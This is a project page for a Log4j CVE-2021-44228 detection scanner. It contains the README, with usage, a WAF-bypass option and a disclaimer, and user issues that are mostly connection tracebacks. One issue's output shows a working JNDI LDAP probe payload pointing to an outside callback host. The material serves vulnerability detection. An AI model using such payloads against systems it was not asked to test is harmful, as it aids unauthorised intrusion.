A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228

Related tags

Networkinglog4j-scan
Overview

log4j-scan

A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

Features

  • Support for lists of URLs.
  • Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools).
  • Fuzzing for HTTP POST Data parameters.
  • Fuzzing for JSON data parameters.
  • Supports DNS callback for vulnerability discovery and validation.
  • WAF Bypass payloads.

Description

We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we worked in preventing this vulnerability with our customers. We are open-sourcing an open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability. This shall be used by security teams to scan their infrastructure for Log4J RCE, and also test for WAF bypasses that can result in achiving code execution on the organization's environment.

It supports DNS OOB callbacks out of the box, there is no need to setup a DNS callback server.

Usage

$ python3 log4j-scan.py -h                                                   
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] [--wait-time WAIT_TIME] [--waf-bypass]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Check a single URL.
  -l USEDLIST, --list USEDLIST
                        Check a list of URLs.
  --request-type REQUEST_TYPE
                        Request Type: (get, post) - [Default: get].
  --headers-file HEADERS_FILE
                        Headers fuzzing list - [default: headers.txt].
  --run-all-tests       Run all available tests on each URL.
  --exclude-user-agent-fuzzing
                        Exclude User-Agent header from fuzzing - useful to bypass weak checks on User-Agents.
  --wait-time WAIT_TIME
                        Wait time after all URLs are processed (in seconds) - [Default: 5].
  --waf-bypass          Extend scans with WAF bypass payloads.

Scan a Single URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

Discover WAF bypasses on the environment.

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

Scan a list of URLs

$ python3 log4j-scan.py -l urls.txt

Installation

$ pip3 install -r requirements.txt

About FullHunt

FullHunt is the next-generation attack surface management platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.

FullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of log4j-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

Mazin Ahmed

Comments
  • Error when trying to scan hosts

    Error when trying to scan hosts

    Greetings,

    I'm receiving this output when I tried to scan an specific host with log4j. This is the command that I used.

    python3 log4j-scan.py -u http://ip-address

    My python version: Python 3.8.10

    I also installed the requirements

    The error output: [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 662, in urlopen self._prepare_proxy(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 950, in _prepare_proxy conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 322, in connect self._tunnel() File "/usr/lib/python3.8/http/client.py", line 901, in _tunnel raise OSError("Tunnel connection failed: %d %s" % (code, OSError: Tunnel connection failed: 403 Forbidden

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send resp = conn.urlopen( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen retries = retries.increment( File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 436, in increment raise MaxRetryError(_pool, url, error or ResponseError(cause)) urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 403 Forbidden')))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "log4j-scan.py", line 386, in main() File "log4j-scan.py", line 356, in main dns_callback = Interactsh() File "log4j-scan.py", line 215, in init self.register() File "log4j-scan.py", line 223, in register res = self.session.post( File "/usr/lib/python3/dist-packages/requests/sessions.py", line 581, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 533, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3/dist-packages/requests/sessions.py", line 646, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3/dist-packages/requests/adapters.py", line 510, in send raise ProxyError(e, request=request) requests.exceptions.ProxyError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 403 Forbidden')))

    opened by alessandronva 11
  • EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)

    EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4)

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). [%] Checking for Log4j RCE CVE-2021-44228. [•] URL: http://URLTOBESCANNED [•] URL: http://URLTOBESCANNED | PAYLOAD: ${jndi:ldap://[snip].interact.sh/chef93i} EXCEPTION: HTTPConnectionPool(host='PROXY', port=8080): Read timed out. (read timeout=4) [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks. [•] Waiting... [•] Targets does not seem to be vulnerable.

    I try to scan an get the message in the title. it says the prxy does not respond. then it goes on to say that it scanned. so did the scan work or did it fail?

    opened by mansam-ger 10
  • Dockerfile - error while/after Initiating DNS callbeack server (interact.sh)

    Dockerfile - error while/after Initiating DNS callbeack server (interact.sh)

    Hi!

    I'm using the Dockerfile - as it is - from this repo.

    i tired the startparameter "-h" first: WORKS. after that, for testing i tried the startparameter "-u https://google.de" (or any other url)

    now my output looks like this:

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    
    [•] Secure your External Attack Surface with FullHunt.io.
    
    [•] Initiating DNS callback server (interact.sh).
    
    Traceback (most recent call last):
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
    
        httplib_response = self._make_request(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
    
        self._validate_conn(conn)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
    
        conn.connect()
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 416, in connect
    
        self.sock = ssl_wrap_socket(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
    
        ssl_sock = _ssl_wrap_socket_impl(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
    
        return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
    
      File "/usr/local/lib/python3.10/ssl.py", line 512, in wrap_socket
    
        return self.sslsocket_class._create(
    
      File "/usr/local/lib/python3.10/ssl.py", line 1070, in _create
    
        self.do_handshake()
    
      File "/usr/local/lib/python3.10/ssl.py", line 1341, in do_handshake
    
        self._sslobj.do_handshake()
    
    ConnectionResetError: [Errno 104] Connection reset by peer
    
    
    
    During handling of the above exception, another exception occurred:
    
    
    
    Traceback (most recent call last):
    
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 439, in send
    
        resp = conn.urlopen(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 755, in urlopen
    
        retries = retries.increment(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/retry.py", line 532, in increment
    
        raise six.reraise(type(error), error, _stacktrace)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/packages/six.py", line 769, in reraise
    
        raise value.with_traceback(tb)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
    
        httplib_response = self._make_request(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
    
        self._validate_conn(conn)
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
    
        conn.connect()
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 416, in connect
    
        self.sock = ssl_wrap_socket(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 449, in ssl_wrap_socket
    
        ssl_sock = _ssl_wrap_socket_impl(
    
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/ssl_.py", line 493, in _ssl_wrap_socket_impl
    
        return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
    
      File "/usr/local/lib/python3.10/ssl.py", line 512, in wrap_socket
    
        return self.sslsocket_class._create(
    
      File "/usr/local/lib/python3.10/ssl.py", line 1070, in _create
    
        self.do_handshake()
    
      File "/usr/local/lib/python3.10/ssl.py", line 1341, in do_handshake
    
        self._sslobj.do_handshake()
    
    urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
    
    
    
    During handling of the above exception, another exception occurred:
    
    
    
    Traceback (most recent call last):
    
      File "/app/log4j-scan.py", line 349, in <module>
    
        main()
    
      File "/app/log4j-scan.py", line 319, in main
    
        dns_callback = Interactsh()
    
      File "/app/log4j-scan.py", line 185, in __init__
    
        self.register()
    
      File "/app/log4j-scan.py", line 193, in register
    
        res = self.session.post(
    
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 590, in post
    
        return self.request('POST', url, data=data, json=json, **kwargs)
    
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 542, in request
    
        resp = self.send(prep, **send_kwargs)
    
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 655, in send
    
        r = adapter.send(request, **kwargs)
    
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 498, in send
    
        raise ConnectionError(err, request=request)
    
    requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
    
    opened by NopeNix 7
  • Error DNS callback server

    Error DNS callback server

    [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/home/kali/log4j-scan/log4j-scan.py", line 335, in main() File "/home/kali/log4j-scan/log4j-scan.py", line 305, in main dns_callback = Interactsh() File "/home/kali/log4j-scan/log4j-scan.py", line 156, in init rsa = RSA.generate(2048) File "/usr/local/lib/python3.9/dist-packages/Crypto/PublicKey/RSA.py", line 508, in generate obj = _RSA.generate_py(bits, rf, progress_func, e) # TODO: Don't use legacy _RSA module File "/usr/local/lib/python3.9/dist-packages/Crypto/PublicKey/_RSA.py", line 50, in generate_py p = pubkey.getStrongPrime(bits>>1, obj.e, 1e-12, randfunc) File "/usr/local/lib/python3.9/dist-packages/Crypto/Util/number.py", line 264, in getStrongPrime return _fastmath.getStrongPrime(int(N), int(e), false_positive_prob, File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read return self._singleton.read(bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read return self._singleton.read(bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read return self._singleton.read(bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 178, in read return _UserFriendlyRNG.read(self, bytes) File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 129, in read self._ec.collect() File "/usr/local/lib/python3.9/dist-packages/Crypto/Random/_UserFriendlyRNG.py", line 77, in collect t = time.clock() AttributeError: module 'time' has no attribute 'clock'

    opened by jagadeeshjs8895 7
  • Error initializing DNS callback server

    Error initializing DNS callback server

    [•] Initiating DNS callback server.
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 174, in _new_conn
        conn = connection.create_connection(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/connection.py", line 96, in create_connection
        raise err
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/connection.py", line 86, in create_connection
        sock.connect(sa)
    socket.timeout: timed out
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 394, in _make_request
        conn.request(method, url, **httplib_request_kw)
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 239, in request
        super(HTTPConnection, self).request(method, url, body=body, headers=headers)
      File "/usr/lib/python3.9/http/client.py", line 1285, in request
        self._send_request(method, url, body, headers, encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1331, in _send_request
        self.endheaders(body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1280, in endheaders
        self._send_output(message_body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.9/http/client.py", line 1040, in _send_output
        self.send(msg)
      File "/usr/lib/python3.9/http/client.py", line 980, in send
        self.connect()
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 205, in connect
        conn = self._new_conn()
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connection.py", line 179, in _new_conn
        raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)')
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/.local/lib/python3.9/site-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/connectionpool.py", line 755, in urlopen
        retries = retries.increment(
      File "/home/kali/.local/lib/python3.9/site-packages/urllib3/util/retry.py", line 574, in increment
        raise MaxRetryError(_pool, url, error or ResponseError(cause))
    urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='www.dnslog.cn', port=80): Max retries exceeded with url: /getdomain.php (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)'))
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 238, in <module>
        main()
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 217, in main
        dns_callback = Dnslog()
      File "/home/kali/software/log4j-scan/log4j-scan.py", line 127, in __init__
        req = self.s.get("http://www.dnslog.cn/getdomain.php", timeout=30)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 555, in get
        return self.request('GET', url, **kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 542, in request
        resp = self.send(prep, **send_kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/sessions.py", line 655, in send
        r = adapter.send(request, **kwargs)
      File "/home/kali/.local/lib/python3.9/site-packages/requests/adapters.py", line 504, in send
        raise ConnectTimeout(e, request=request)
    requests.exceptions.ConnectTimeout: HTTPConnectionPool(host='www.dnslog.cn', port=80): Max retries exceeded with url: /getdomain.php (Caused by ConnectTimeoutError(<urllib3.connection.HTTPConnection object at 0x7fce69752850>, 'Connection to www.dnslog.cn timed out. (connect timeout=30)'))
    
    
    opened by pdelteil 7
  • [EXCEPTIONS] ConnectionError

    [EXCEPTIONS] ConnectionError

    Hello, I'm facing this issue can anybody help me with this?

    requests.exceptions.ConnectionError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7faa56dd0c18>: Failed to establish a new connection: [Errno 111] Connection refused',))

    opened by sokobban 6
  • [•] Initiating DNS callback server (interact.sh). Error

    [•] Initiating DNS callback server (interact.sh). Error

    I've tried running the script and docker container today and I've been getting:

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
        conn = connection.create_connection(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/connection.py", line 96, in create_connection
        raise err
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/connection.py", line 86, in create_connection
        sock.connect(sa)
    TimeoutError: timed out
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 699, in urlopen
        httplib_response = self._make_request(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 382, in _make_request
        self._validate_conn(conn)
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 1010, in _validate_conn
        conn.connect()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 358, in connect
        conn = self._new_conn()
      File "/usr/local/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
        raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)')
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 439, in send
        resp = conn.urlopen(
      File "/usr/local/lib/python3.10/site-packages/urllib3/connectionpool.py", line 755, in urlopen
        retries = retries.increment(
      File "/usr/local/lib/python3.10/site-packages/urllib3/util/retry.py", line 574, in increment
        raise MaxRetryError(_pool, url, error or ResponseError(cause))
    urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)'))
    
    During handling of the above exception, another exception occurred:
    
    Traceback (most recent call last):
      File "/app/log4j-scan.py", line 412, in <module>
        main()
      File "/app/log4j-scan.py", line 382, in main
        dns_callback = Interactsh()
      File "/app/log4j-scan.py", line 239, in __init__
        self.register()
      File "/app/log4j-scan.py", line 247, in register
        res = self.session.post(
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 590, in post
        return self.request('POST', url, data=data, json=json, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 542, in request
        resp = self.send(prep, **send_kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/sessions.py", line 655, in send
        r = adapter.send(request, **kwargs)
      File "/usr/local/lib/python3.10/site-packages/requests/adapters.py", line 504, in send
        raise ConnectTimeout(e, request=request)
    requests.exceptions.ConnectTimeout: HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by ConnectTimeoutError(<urllib3.connection.HTTPSConnection object at 0x7f01f4b6f700>, 'Connection to interact.sh timed out. (connect timeout=30)'))
    
    

    Is there something I'm doing wrong?

    Thank you, Pete

    opened by mirtec001 5
  • DNS callback error:

    DNS callback error: "Connection reset by peer"

    Hi, I cannot get this to work, and I don't see my issue posted. Any help would be appreciated, thank you.

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 600, in urlopen chunked=chunked) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 343, in _make_request self._validate_conn(conn) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 839, in validate_conn conn.connect() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 358, in connect ssl_context=context) File "/usr/lib/python3.6/site-packages/urllib3/util/ssl.py", line 354, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib64/python3.6/ssl.py", line 365, in wrap_socket _context=self, _session=session) File "/usr/lib64/python3.6/ssl.py", line 776, in init self.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 1036, in do_handshake self._sslobj.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 648, in do_handshake self._sslobj.do_handshake() ConnectionResetError: [Errno 104] Connection reset by peer

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 449, in send timeout=timeout File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 638, in urlopen _stacktrace=sys.exc_info()[2]) File "/usr/lib/python3.6/site-packages/urllib3/util/retry.py", line 368, in increment raise six.reraise(type(error), error, _stacktrace) File "/usr/lib/python3.6/site-packages/urllib3/packages/six.py", line 692, in reraise raise value.with_traceback(tb) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 600, in urlopen chunked=chunked) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 343, in _make_request self._validate_conn(conn) File "/usr/lib/python3.6/site-packages/urllib3/connectionpool.py", line 839, in validate_conn conn.connect() File "/usr/lib/python3.6/site-packages/urllib3/connection.py", line 358, in connect ssl_context=context) File "/usr/lib/python3.6/site-packages/urllib3/util/ssl.py", line 354, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib64/python3.6/ssl.py", line 365, in wrap_socket _context=self, _session=session) File "/usr/lib64/python3.6/ssl.py", line 776, in init self.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 1036, in do_handshake self._sslobj.do_handshake() File "/usr/lib64/python3.6/ssl.py", line 648, in do_handshake self._sslobj.do_handshake() urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last): File "log4j-scan.py", line 365, in main() File "log4j-scan.py", line 335, in main dns_callback = Interactsh() File "log4j-scan.py", line 195, in init self.register() File "log4j-scan.py", line 204, in register f"https://{self.server}/register", headers=self.headers, json=data, timeout=30) File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 581, in post return self.request('POST', url, data=data, json=json, **kwargs) File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 533, in request resp = self.send(prep, **send_kwargs) File "/usr/lib/python3.6/site-packages/requests/sessions.py", line 646, in send r = adapter.send(request, **kwargs) File "/usr/lib/python3.6/site-packages/requests/adapters.py", line 498, in send raise ConnectionError(err, request=request) requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    opened by lgaalswyk 5
  • Crypto.Cipher import AES, PKCS1_OAEP

    Crypto.Cipher import AES, PKCS1_OAEP

    File "/home/parallels/Log4j-RCE-Scanner/log4j-scan/log4j-scan.py", line 22, in from Crypto.Cipher import AES, PKCS1_OAEP ModuleNotFoundError: No module named 'Crypto'

    opened by ehsan235 5
  • AttributeError: module 'time' has no attribute 'clock' when running with Python 3.9.9

    AttributeError: module 'time' has no attribute 'clock' when running with Python 3.9.9

    I'm getting this stack trace when launching with

    > python3 --version
    Python 3.9.9
    > uname -v 
    Darwin Kernel Version 19.6.0: Tue Jun 22 19:49:55 PDT 2021; root:xnu-6153.141.35~1/RELEASE_X86_64
    
    > python3 log4j-scan.py -u https://myservice.com --run-all-tests
    [•] CVE-2021-44228 - Apache Log4j RCE Scanner
    [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
    [•] Secure your External Attack Surface with FullHunt.io.
    [•] Initiating DNS callback server (interact.sh).
    Traceback (most recent call last):
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 336, in <module>
        main()
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 306, in main
        dns_callback = Interactsh()
      File "/Users/rochec/Documents/Temp/log4j-scan/log4j-scan.py", line 156, in __init__
        rsa = RSA.generate(2048)
      File "/usr/local/lib/python3.9/site-packages/Crypto/PublicKey/RSA.py", line 508, in generate
        obj = _RSA.generate_py(bits, rf, progress_func, e)    # TODO: Don't use legacy _RSA module
      File "/usr/local/lib/python3.9/site-packages/Crypto/PublicKey/_RSA.py", line 50, in generate_py
        p = pubkey.getStrongPrime(bits>>1, obj.e, 1e-12, randfunc)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Util/number.py", line 264, in getStrongPrime
        return _fastmath.getStrongPrime(int(N), int(e), false_positive_prob,
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 202, in read
        return self._singleton.read(bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 178, in read
        return _UserFriendlyRNG.read(self, bytes)
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 129, in read
        self._ec.collect()
      File "/usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py", line 77, in collect
        t = time.clock()
    AttributeError: module 'time' has no attribute 'clock'
    

    Seems to be due to this:

    The function time.clock() has been removed, after having been deprecated since Python 3.3: use time.perf_counter() or time.process_time() instead, depending on your requirements, to have well-defined behavior.
    
    opened by chroche 5
  • Error on a first run

    Error on a first run

    When you run command: python3 log4j-scan.py -h

    you get the error message: File "log4j-scan.py", line 132 fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'

    opened by YanDatsiuk 4
  • Addressed issue

    Addressed issue "interact.sh server unavailable #131"

    Added '--disable-tls-to-register-dns' arg to fix communication issue with interact.sh. Also added a validation when pulling the logs in case data_list is None

    opened by hackercat3211 0
  • interact.sh server unavailable

    interact.sh server unavailable

    HTTPSConnectionPool(host='interact.sh', port=443): Max retries exceeded with url: /register (Caused by NewConnectionError('<urllib3.connection.HTTPSConnection object at 0x7f284db3a350>: Failed to establish a new connection: [Errno 111] Connection refused'))

    opened by ademighty24 8
  • Fix issue on interact.sh `pull_logs` function ('NoneType' object is not iterable)

    Fix issue on interact.sh `pull_logs` function ('NoneType' object is not iterable)

    Add a null check before iterating in pull_logs to avoid this error:

    [•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
    [•] Waiting...
        main()
      File "/app/log4j-scan.py", line 401, in main
        records = dns_callback.pull_logs()
      File "/app/log4j-scan.py", line 257, in pull_logs
        for i in data_list:
    TypeError: 'NoneType' object is not iterable
    
    opened by pierre42100 0
  • Syntax error in code. Please advise

    Syntax error in code. Please advise

    if "Referer" in fuzzing_headers: fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}' return fuzzing_headers

    This section of code produces a syntax error which is annoying, can you please help me fix this.

    Peter fuzzingerror

    opened by Morpheyous 1
  • requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))

    python3 log4j-scan.py -u https://vcenter7.******.***.**/ui/login #Local server

    [•] CVE-2021-44228 - Apache Log4j RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] Initiating DNS callback server (interact.sh). Traceback (most recent call last): File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen httplib_response = self._make_request( File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 376, in _make_request self._validate_conn(conn) File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 996, in validate_conn conn.connect() File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 366, in connect self.sock = ssl_wrap_socket( File "/usr/lib/python3/dist-packages/urllib3/util/ssl.py", line 370, in ssl_wrap_socket return context.wrap_socket(sock, server_hostname=server_hostname) File "/usr/lib/python3.8/ssl.py", line 500, in wrap_socket return self.sslsocket_class._create( File "/usr/lib/python3.8/ssl.py", line 1040, in _create self.do_handshake() File "/usr/lib/python3.8/ssl.py", line 1309, in do_handshake self._sslobj.do_handshake() ConnectionResetError: [Errno 104] Connection reset by peer

    During handling of the above exception, another exception occurred:

